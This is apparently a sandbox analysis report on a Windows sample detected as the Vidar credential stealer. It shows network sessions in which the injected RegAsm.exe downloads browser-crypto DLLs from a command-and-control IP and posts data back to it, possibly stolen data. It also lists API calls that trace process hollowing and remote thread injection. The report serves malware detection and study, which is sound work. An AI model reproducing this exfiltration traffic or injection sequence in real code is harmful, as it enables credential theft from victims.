14 | 192.168.2.4 | 49749 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:20 UTC | 153 | OUT | GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Cache-Control: no-cache
2024-04-19 15:08:21 UTC | 248 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:20 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-1f3950"
Accept-Ranges: bytes


Session ID: 15
Source IP: 192.168.2.4
Source Port: 49750
Destination IP: 37.27.87.155
Destination Port: 443
PID: 7532
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp: 2024-04-19 15:08:23 UTC, Bytes transferred: 157, Direction: OUT, Data:
GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Cache-Control: no-cache

Timestamp: 2024-04-19 15:08:23 UTC, Bytes transferred: 246, Direction: IN, Data:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:23 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-3ef50"
Accept-Ranges: bytes


Session ID: 16
Source IP: 192.168.2.4
Source Port: 49751
Destination IP: 37.27.87.155
Destination Port: 443
PID: 7532
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp: 2024-04-19 15:08:25 UTC, Bytes transferred: 161, Direction: OUT, Data:
GET /vcruntime140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Cache-Control: no-cache

Timestamp: 2024-04-19 15:08:25 UTC, Bytes transferred: 245, Direction: IN, Data:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:25 GMT
Content-Type: application/octet-stream
Content-Length: 80880
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-13bf0"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49752 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:26 UTC | 262 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDG
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 1145
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-19 15:08:26 UTC | 1145 | OUT | Data Ascii: ------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------HDBGDHDAECBGDHJKFIDGCont
2024-04-19 15:08:27 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-19 15:08:27 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49753 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:28 UTC | 261 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FHCBGDAAFBKEBGDHDBKE
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-19 15:08:28 UTC | 331 | OUT | Data Ascii: ------FHCBGDAAFBKEBGDHDBKEContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------FHCBGDAAFBKEBGDHDBKEContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------FHCBGDAAFBKEBGDHDBKECont
2024-04-19 15:08:28 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49754 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:29 UTC | 261 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIJEGIIJDGHDGCBGHCAA
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-19 15:08:29 UTC | 331 | OUT | Data Ascii: ------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------HIJEGIIJDGHDGCBGHCAACont
2024-04-19 15:08:30 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49755 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:31 UTC | 261 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHI
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 453
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-19 15:08:31 UTC | 453 | OUT | Data Ascii: ------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------BAKFCBFHJDHJKECAKEHICont
2024-04-19 15:08:32 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-19 15:08:32 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49756 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:33 UTC | 264 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKF
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 113433
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-19 15:08:33 UTC | 16355 | OUT | Data Ascii: ------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------HCFIJKKKKKFCAAAAFBKFCont
2024-04-19 15:08:35 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-19 15:08:35 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49757 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:35 UTC | 261 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKFIJJEGHDAEBGCAKJKF
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-19 15:08:35 UTC | 331 | OUT | Data Ascii: ------BKFIJJEGHDAEBGCAKJKFContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------BKFIJJEGHDAEBGCAKJKFContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------BKFIJJEGHDAEBGCAKJKFCont
2024-04-19 15:08:36 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-19 15:08:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49758 | 37.27.87.155 | 443 | 7532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:08:36 UTC | 261 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDG
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 37.27.87.155
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-04-19 15:08:36 UTC | 331 | OUT | Data Ascii: ------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------HDBGDHDAECBGDHJKFIDGCont
2024-04-19 15:08:37 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Apr 2024 15:08:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-04-19 15:08:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0



                                                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                                                Start time:17:07:56
                                                                                                                                                                                                                                                                                                Start date:19/04/2024
                                                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                                                                Imagebase:0x3c0000
                                                                                                                                                                                                                                                                                                File size:402'432 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:B841D5F5E8102EE6AC56D565FBB58879
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                                                                                Start time:17:07:56
                                                                                                                                                                                                                                                                                                Start date:19/04/2024
                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                                                                Start time:17:07:56
                                                                                                                                                                                                                                                                                                Start date:19/04/2024
                                                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                                                                                Imagebase:0x460000
                                                                                                                                                                                                                                                                                                File size:65'440 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                                                                Start time:17:07:56
                                                                                                                                                                                                                                                                                                Start date:19/04/2024
                                                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                                                                                Imagebase:0x600000
                                                                                                                                                                                                                                                                                                File size:65'440 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                                                                                Start time:17:07:56
                                                                                                                                                                                                                                                                                                Start date:19/04/2024
                                                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                                                                                Imagebase:0x4c0000
                                                                                                                                                                                                                                                                                                File size:65'440 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                                                                                Start time:17:07:56
                                                                                                                                                                                                                                                                                                Start date:19/04/2024
                                                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                                                                                Imagebase:0xe80000
                                                                                                                                                                                                                                                                                                File size:65'440 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true


                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                  Execution Coverage:3%
                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:1.4%
                                                                                                                                                                                                                                                                                                  Signature Coverage:2.7%
                                                                                                                                                                                                                                                                                                  Total number of Nodes:637
                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:6

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 004223BC
                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 004223CF
                                                                                                                                                                                                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 004223ED
                                                                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00422411
                                                                                                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 0042243C
                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNELBASE(?,00000000), ref: 0042245B
                                                                                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 00422494
                                                                                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 004224DF
                                                                                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0042251D
                                                                                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00422559
                                                                                                                                                                                                                                                                                                  • ResumeThread.KERNELBASE(?), ref: 00422568
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                                                                                                                                                                                                                                  • String ID: GetP$Load$aryA$ress
                                                                                                                                                                                                                                                                                                  • API String ID: 2440066154-977067982
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C1D41: _strlen.LIBCMT ref: 003C1D59
                                                                                                                                                                                                                                                                                                  • VirtualProtectEx.KERNELBASE(000000FF,004220C0,000004AC,00000040,?,?,006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@), ref: 003E3338
                                                                                                                                                                                                                                                                                                  • FreeConsole.KERNELBASE ref: 003E333E
                                                                                                                                                                                                                                                                                                  • CreateRemoteThread.KERNELBASE(000000FF,00000000,00000000,Function_00062248,003EEAC0,00000000,?), ref: 003E338C
                                                                                                                                                                                                                                                                                                  • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000001), ref: 003E3399
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 003E33A0
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • 006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@, xrefs: 003E32F5
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseConsoleCreateFreeHandleObjectProtectRemoteSingleThreadVirtualWait_strlen
                                                                                                                                                                                                                                                                                                  • String ID: 006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@
                                                                                                                                                                                                                                                                                                  • API String ID: 3638600928-32248209
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Control-flow Graph

[Control-flow graph image not recovered; labelled nodes: LoadLibraryExW, GetLastError, FreeLibrary]
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,F8250000,?,AFD2407A,?,003D5589,003CB2B6,?,F8250000,00000000), ref: 003D553D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                                                  • Opcode ID: fc53479b07c8c000ab02e99613fb1275197b3d4040a1b8001f64c19caa5921fe
                                                                                                                                                                                                                                                                                                  • Instruction ID: 02a42446a01f1d69e137b80c029c54d3b9fe0bcd418ce31d8626c6b8434fd7a7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc53479b07c8c000ab02e99613fb1275197b3d4040a1b8001f64c19caa5921fe
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E121C633A01511BBCB339B25FC40A5A776EEF56761F160262E906AB3D0E670EF01C6D0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 003D8466
                                                                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 003D8527
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 003D858E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D2E83: HeapAlloc.KERNEL32(00000000,003D9981,?,?,003D9981,00000220,?,?,?), ref: 003D2EB5
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 003D85A3
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 003D85B3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
